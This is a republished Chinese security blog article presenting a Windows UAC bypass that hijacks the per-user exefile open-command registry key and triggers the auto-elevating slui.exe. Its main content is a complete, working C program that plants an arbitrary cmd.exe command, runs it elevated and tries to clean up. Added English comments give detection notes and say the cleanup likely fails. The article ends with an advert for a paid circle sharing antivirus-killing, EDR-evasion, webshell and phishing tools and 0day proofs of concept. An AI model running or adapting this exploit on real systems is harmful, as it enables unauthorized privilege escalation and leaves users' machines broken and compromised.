【UAC提权】白名单进程提权手法

admin 2026-03-05 19:38:34 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文介绍了一种利用Windows白名单进程slui.exe进行UAC提权的方法。通过修改注册表中exefile关联键值,劫持可执行文件打开方式,触发slui.exe的autoElevate属性实现高权限命令执行。文章提供了完整的C语言实现代码,包括注册表操作、进程启动和清理流程。该技术属于已公开的UAC绕过手法,适用于红队渗透测试场景,文末附带付费圈子推广内容。 综合评分: 70 文章分类: 内网渗透,红队,渗透测试,免杀,软文广告



【UAC提权】白名单进程提权手法

原创

Hello888 Hello888

安全天书

2026年3月5日 10:01 广西

0x01 声明

本文所涉及的技术、思路和工具仅用于安全测试和防御研究,切勿将其用于非法入侵或攻击他人系统等目的,一切后果由使用者自行承担!!!

0x02 UAC介绍

slui.exe 是 Windows 自带、带有微软签名且具备 autoElevate 属性的工具。它在提权执行的过程中会读取注册表中的相关键值,并将其内容当作命令执行。

0x03 代码实现

/*
 * Listing from the article: a UAC-bypass proof of concept that overrides the
 * current user's exefile open handler
 * (HKCU\Software\Classes\exefile\Shell\Open\command) with a cmd.exe command
 * line, launches the auto-elevating slui.exe through the "runas" verb, waits
 * up to 10 seconds, then attempts to delete the keys it created.
 *
 * Defender notes, grounded in this listing only:
 *  - The per-user exefile\Shell\Open\command key is the observable artifact.
 *    A non-installer process creating or rewriting it is what to alert on;
 *    auditing that key path catches this variant regardless of the payload.
 *  - While the override is in place every .exe this user launches runs the
 *    planted command (the program itself prints this caveat at the end), so a
 *    failed or aborted cleanup leaves user-wide breakage as well as an IoC.
 */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "shell32.lib")

// Registry path of the per-user exefile open-command handler (under HKCU).
#define EXEFILE_REG_PATH L"Software\\Classes\\exefile\\Shell\\Open\\command"

// Forward declarations (ShowCurrentExefileValue is defined before main and
// has no prototype here).
BOOL CreateExefileRegistryKey(LPCWSTR encodedCommand);
BOOL RunSluiAndWait(void);
BOOL CleanupExefileRegistry(void);
BOOL IsElevated(void);
void ShowLastError(const char* msg);
void EncodeCommand(LPWSTR lpBuffer, DWORD dwSize, LPCWSTR lpCommand);

/*
 * Print the calling thread's last Win32 error, prefixed with `msg`.
 * Uses FormatMessageW with FORMAT_MESSAGE_ALLOCATE_BUFFER, so the system
 * message is freed with LocalFree; if no message text is available only the
 * numeric code is printed.
 */
void ShowLastError(const char* msg) {
    DWORD errorCode = GetLastError();
    LPWSTR errorMessage = NULL;
    FormatMessageW(
        FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
        NULL, errorCode, 0, (LPWSTR)&errorMessage, 0, NULL
    );
    if (errorMessage) {
        printf("[!] %s 失败,错误代码: %lu - %ws\n", msg, errorCode, errorMessage);
        LocalFree(errorMessage);
    }
    else {
        printf("[!] %s 失败,错误代码: %lu\n", msg, errorCode);
    }
}

/*
 * Return TRUE when the current process token reports TokenIsElevated.
 * Returns FALSE if the token cannot be opened or queried; the token handle is
 * closed on the success path.
 */
BOOL IsElevated(void) {
    BOOL fRet = FALSE;
    HANDLE hToken = NULL;
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
        TOKEN_ELEVATION elevation;
        DWORD cbSize = sizeof(TOKEN_ELEVATION);
        if (GetTokenInformation(hToken, TokenElevation, &elevation, cbSize, &cbSize)) {
            fRet = elevation.TokenIsElevated;
        }
        CloseHandle(hToken);
    }
    return fRet;
}

/*
 * Build the command line that will be written as the exefile handler.
 *
 * lpBuffer/dwSize: destination buffer and its capacity in WCHARs.
 * lpCommand:       user-supplied command, or NULL/empty for the built-in
 *                  default ("cmd.exe /k echo ... && whoami").
 *
 * A non-empty lpCommand is wrapped as "cmd.exe /c <command>". Despite the
 * name, nothing is encoded or escaped here; the text is used verbatim.
 * wcscpy_s/swprintf_s truncate or fail on overflow per the CRT's
 * invalid-parameter handling rather than overrunning lpBuffer.
 */
void EncodeCommand(LPWSTR lpBuffer, DWORD dwSize, LPCWSTR lpCommand) {
    if (lpCommand == NULL || wcslen(lpCommand) == 0) {
        // Default: open an elevated console that proves the elevation.
        wcscpy_s(lpBuffer, dwSize, L"cmd.exe /k echo UAC Bypass Success! && whoami");
    }
    else {
        // Wrap the user-specified command in cmd.exe /c.
        swprintf_s(lpBuffer, dwSize, L"cmd.exe /c %s", lpCommand);
    }
}

/*
 * Create HKCU\Software\Classes\exefile\Shell\Open\command and set its default
 * value (REG_SZ) to `encodedCommand`.
 *
 * Returns TRUE only if both the key creation and the value write succeed.
 * The key handle is closed on every path after a successful open.
 *
 * Defender note: this write is the detection point. The per-user
 * HKCU\Software\Classes hive shadows the machine-wide exefile association
 * for this user, so the change takes effect without any elevation.
 */
BOOL CreateExefileRegistryKey(LPCWSTR encodedCommand) {
    HKEY hKey;
    DWORD dwDisposition;
    LONG result;
    BOOL success = FALSE;
    printf("[*] 打开注册表路径: HKCU\\Software\\Classes\\\n");
    // Create (or open) the full command key in one call; intermediate keys
    // are created implicitly. The literal duplicates EXEFILE_REG_PATH.
    result = RegCreateKeyExW(
        HKEY_CURRENT_USER,
        L"Software\\Classes\\exefile\\Shell\\Open\\command",
        0,
        NULL,
        REG_OPTION_NON_VOLATILE,
        KEY_SET_VALUE | KEY_CREATE_SUB_KEY,
        NULL,
        &hKey,
        &dwDisposition
    );
    if (result != ERROR_SUCCESS) {
        printf("[!] 创建/打开注册表键失败,错误: %ld\n", result);
        return FALSE;
    }
    printf("[*] 键状态: %s\n", (dwDisposition == REG_CREATED_NEW_KEY) ? "新建" : "已存在");
    // Set the default value to the constructed command line, including the
    // terminating NUL in the byte count.
    result = RegSetValueExW(hKey, L"", 0, REG_SZ, (const BYTE*)encodedCommand, (wcslen(encodedCommand) + 1) * sizeof(WCHAR));
    if (result == ERROR_SUCCESS) {
        printf("[+] 已设置默认值: %ws\n", encodedCommand);
        success = TRUE;
    }
    else {
        printf("[!] 设置注册表值失败,错误: %ld\n", result);
    }
    RegCloseKey(hKey);
    return success;
}

/*
 * Launch C:\windows\system32\slui.exe with the "runas" verb and a hidden
 * window, then wait up to 10 seconds for it to exit.
 *
 * Returns FALSE only if ShellExecuteExW fails (the Win32 error is printed via
 * ShowLastError). A wait timeout or wait error still returns TRUE; the
 * caller cannot distinguish those outcomes from a clean exit.
 */
BOOL RunSluiAndWait(void) {
    SHELLEXECUTEINFOW sei = { 0 };
    BOOL result;
    HANDLE hProcess = NULL;
    printf("[*] 正在启动 slui.exe 并请求管理员权限...\n");
    sei.cbSize = sizeof(SHELLEXECUTEINFOW);
    sei.fMask = SEE_MASK_NOCLOSEPROCESS;  // Keep the process handle so we can wait on it.
    sei.lpVerb = L"runas";                 // Request elevation through the shell.
    sei.lpFile = L"C:\\windows\\system32\\slui.exe";
    sei.nShow = SW_HIDE;                   // Hidden window.
    result = ShellExecuteExW(&sei);
    if (!result) {
        ShowLastError("ShellExecuteExW");
        return FALSE;
    }
    hProcess = sei.hProcess;
    printf("[+] slui.exe 已启动,进程句柄: %p\n", hProcess);
    if (hProcess) {
        printf("[*] 等待 10 秒钟...\n");
        // Wait 10 seconds (10000 ms).
        DWORD waitResult = WaitForSingleObject(hProcess, 10000);
        if (waitResult == WAIT_OBJECT_0) {
            printf("[*] slui.exe 已退出\n");
        }
        else if (waitResult == WAIT_TIMEOUT) {
            printf("[*] 等待超时 (10秒)\n");
        }
        else {
            printf("[!] 等待进程时出错\n");
        }
        CloseHandle(hProcess);
    }
    return TRUE;
}

/*
 * Delete the exefile keys created earlier, innermost first:
 * ...\exefile\Shell\Open\command, then ...\exefile\Shell, then ...\exefile.
 * ERROR_FILE_NOT_FOUND is treated as success at every step.
 *
 * Returns TRUE if the final ...\exefile deletion succeeds or the key is
 * already gone; failures of the intermediate deletions are only printed.
 *
 * NOTE(review): RegDeleteKeyW does not delete keys that still have subkeys,
 * and the ...\exefile\Shell\Open key created implicitly by
 * RegCreateKeyExW is never removed here, so the Shell and exefile deletions
 * are likely to fail and the handler override to remain — verify on a test
 * VM. From a defensive standpoint that leftover HKCU exefile key both breaks
 * normal .exe launches for the user and is a durable forensic artifact.
 */
BOOL CleanupExefileRegistry(void) {
    LONG result;
    printf("[*] 正在清理注册表...\n");
    // Delete the command subkey first.
    result = RegDeleteKeyW(HKEY_CURRENT_USER, L"Software\\Classes\\exefile\\Shell\\Open\\command");
    if (result != ERROR_SUCCESS && result != ERROR_FILE_NOT_FOUND) {
        printf("[!] 删除command子键失败,错误: %ld\n", result);
    }
    // Delete the Shell key.
    result = RegDeleteKeyW(HKEY_CURRENT_USER, L"Software\\Classes\\exefile\\Shell");
    if (result != ERROR_SUCCESS && result != ERROR_FILE_NOT_FOUND) {
        printf("[!] 删除Shell键失败,错误: %ld\n", result);
    }
    // Delete the exefile key.
    result = RegDeleteKeyW(HKEY_CURRENT_USER, L"Software\\Classes\\exefile");
    if (result == ERROR_SUCCESS || result == ERROR_FILE_NOT_FOUND) {
        printf("[+] 注册表清理完成\n");
        return TRUE;
    }
    else {
        printf("[!] 清理注册表失败,错误: %ld\n", result);
        return FALSE;
    }
}

/*
 * Read-only diagnostic: print the current default value of
 * HKCU\<EXEFILE_REG_PATH>, or a message if the key or value is absent.
 *
 * NOTE(review): RegQueryValueExW does not guarantee a NUL terminator for
 * REG_SZ data; a 1024-WCHAR value that exactly fills szValue would be
 * printed unterminated. Harmless for a diagnostic, but worth knowing.
 */
void ShowCurrentExefileValue(void) {
    HKEY hKey;
    WCHAR szValue[1024] = L"";
    DWORD dwSize = sizeof(szValue);   // Byte count, as RegQueryValueExW expects.
    LONG result;
    result = RegOpenKeyExW(HKEY_CURRENT_USER, EXEFILE_REG_PATH, 0, KEY_READ, &hKey);
    if (result == ERROR_SUCCESS) {
        result = RegQueryValueExW(hKey, L"", NULL, NULL, (LPBYTE)szValue, &dwSize);
        if (result == ERROR_SUCCESS) {
            printf("[*] 当前exefile注册表值: %ws\n", szValue);
        }
        else {
            printf("[*] 当前exefile注册表值不存在或无法读取\n");
        }
        RegCloseKey(hKey);
    }
    else {
        printf("[*] exefile注册表键不存在\n");
    }
}

/*
 * Entry point. Flow:
 *   1. report elevation state and the current exefile handler value;
 *   2. join argv[1..] (converted with CP_ACP) into one command, or use the
 *      default when no arguments are given;
 *   3. write the handler key, launch slui.exe, then clean up.
 *
 * Exit status: 1 if the registry write or the slui.exe launch fails (cleanup
 * is attempted in the latter case), 0 otherwise. The return value of the
 * final CleanupExefileRegistry() is ignored, so exit 0 does not mean the
 * handler override was actually removed.
 *
 * NOTE(review): MultiByteToWideChar is called with a 256-WCHAR wArg and its
 * return value is not checked; an argument longer than that leaves wArg
 * uninitialized before wcscat_s reads it. Every printf uses a literal format
 * string, so argv never reaches a format-string position.
 */
int main(int argc, char* argv[]) {
    WCHAR encodedCommand[1024] = L"";
    WCHAR userCommand[1024] = L"";
    int i;
    printf("[*] UAC绕过工具 - 通过修改exefile注册表关联劫持可执行文件\n");
    printf("[*] 当前进程ID: %lu\n", GetCurrentProcessId());
    // Report whether we are already elevated (informational only; the flow
    // below runs either way).
    if (IsElevated()) {
        printf("[+] 当前已是管理员权限\n");
    }
    else {
        printf("[*] 当前不是管理员权限\n");
    }
    // Show the current exefile handler value before touching it.
    ShowCurrentExefileValue();
    // Collect the user-specified command, if any.
    if (argc > 1) {
        // Join the command-line arguments with single spaces.
        wcscpy_s(userCommand, 1024, L"");
        for (i = 1; i < argc; i++) {
            if (i > 1) {
                wcscat_s(userCommand, 1024, L" ");
            }
            // Convert char* (ANSI code page) to WCHAR*.
            WCHAR wArg[256];
            MultiByteToWideChar(CP_ACP, 0, argv[i], -1, wArg, 256);
            wcscat_s(userCommand, 1024, wArg);
        }
        printf("[*] 用户指定的命令: %ws\n", userCommand);
    }
    else {
        printf("[*] 未指定命令,使用默认命令\n");
    }
    // Build the command line that will become the exefile handler.
    EncodeCommand(encodedCommand, 1024, (argc > 1) ? userCommand : NULL);
    printf("[*] 编码后的命令: %ws\n", encodedCommand);
    printf("\n[*] 步骤1: 创建exefile注册表键并设置命令\n");
    // Step 1: write the handler key.
    if (!CreateExefileRegistryKey(encodedCommand)) {
        printf("[!] 创建注册表键失败,退出\n");
        system("pause");
        return 1;
    }
    printf("\n[*] 步骤2: 启动slui.exe触发UAC提权\n");
    // Step 2: launch slui.exe and wait up to 10 seconds.
    if (!RunSluiAndWait()) {
        printf("[!] 启动slui.exe失败\n");
        CleanupExefileRegistry();
        system("pause");
        return 1;
    }
    printf("\n[*] 步骤3: 清理注册表\n");
    // Step 3: remove the registry keys (result not checked).
    CleanupExefileRegistry();
    printf("\n[+] UAC绕过完成!\n");
    printf("[*] 说明: 当任何exe文件被运行时,将执行指定的命令\n");
    printf("[*] 注意: 这个修改可能会影响系统正常运行\n");
    system("pause");
    return 0;
}

0x04 红蓝偶像练习生小圈子

圈子主要研究方向渗透测试、红蓝对抗、钓鱼手法思路、武器化作,红队工具二开与免杀。圈内不定期分享红队技术文章,攻防经验总结,学习笔记以及自研工具与插件,目前圈子已满300人,欢迎各位进圈子交流学习!

圈子目前更新相关技术文章:

* HeavenlyBypassAV内部版-轻松免杀各大杀软

  • Heavenly白加黑自动化生成免杀工具

  • 冰蝎webshell免杀工具

  • 哥斯拉webshell免杀工具

  • 红队场景下lnk钓鱼Bypass国内AV

  • Frp免杀隧道工具

  • 1day和0dayPOC

  • lnk钓鱼思路视频讲解

  • lnk钓鱼Bypass天擎

  • msi钓鱼

  • chm钓鱼

  • Kill360核晶

  • AV对抗-致盲AV(核晶)

  • 捆绑免杀360

  • Kill火绒

  • 火绒6.0内存免杀

  • kill-windows Defender

  • Defender分离免杀

  • Defender知识点

  • HeavenlyProtectionCS内部CS插件

  • EDR对抗思路

  • 进程注入知识点

  • 自启动思路

  • 多种维权手法

  • Fscan免杀核晶

  • QVM解决思路

  • 红队思路-钓鱼环境下小窗口截屏窃取

  • 免杀Todesk/向日葵读取工具

  • 渗透测试文章思路

  • 内网对抗文章思路

  • 还有更多红队思路文章!期待您的加入!!!


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:安全天书 Hello888 Hello888《【UAC提权】白名单进程提权手法》
